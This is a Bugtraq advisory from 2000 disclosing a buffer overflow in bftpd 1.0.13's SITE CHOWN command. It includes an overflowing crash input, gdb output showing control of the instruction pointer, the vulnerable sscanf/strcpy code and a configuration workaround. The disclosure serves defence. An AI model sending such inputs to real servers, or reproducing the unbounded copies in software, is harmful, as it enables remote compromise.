Date: Wed, 13 Dec 2000 20:13:25 +0100 From: BAILLEUX Christophe <cb@GROLIER.FR> Subject: Potential Buffer Overflow vulnerability in bftpd-1.0.13 To: BUGTRAQ@SECURITYFOCUS.COM There is a potential buffer overflow vulnerability in the command "SITE CHOWN" 230 User logged in. site chown AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAA A 550 User 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' not found. Connection closed by foreign host. gdb /usr/sbin/bftpd 18214 ............. Loaded symbols for /lib/libnss_compat.so.2 Reading symbols from /lib/libnsl.so.1...done. Loaded symbols for /lib/libnsl.so.1 0x400e7514 in read () from /lib/libc.so.6 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) x $esp 0xbffffc68: 0x41414141 (gdb) The problem is in the command_chown function in commands.c : 465 void command_chown(char *params) { 466 char foo[USERLEN + 1], owner[USERLEN + 1], group[USERLEN + 1], filename[256]; 467 int uid, gid; 468 if(!strstr(params, " ")) { 469 fprintf(stderr, "550 Usage: SITE CHOWN <owner>[.<group>] <filename>\r\n"); 470 return; 471 } 472 sscanf(params, "%[^ ] %s", foo, filename); 473 if(strstr(foo, ".")) 474 sscanf(foo, "%[^.].%s", owner, group); 475 else { 476 strcpy(owner, foo); 477 group[0] = '\0'; 478 } 479 if(!sscanf(owner, "%i", &uid)) /* Is it a number? */ 480 if(((uid = mygetpwnam(owner, passwdfile))) < 0) { 481 fprintf(stderr, "550 User '%s' not found.\r\n", owner); 482 return; 483 } Workaround : Replace in /etc/bftpd.conf ENABLE_SITE=yes by ENABLE_SITE=no Best regards, -- BAILLEUX Christophe - Network & System Security Engineer Grolier Interactive Europe-OG/CS Voice:+33-(0)1-5545-4789 - mailto:cb@grolier.fr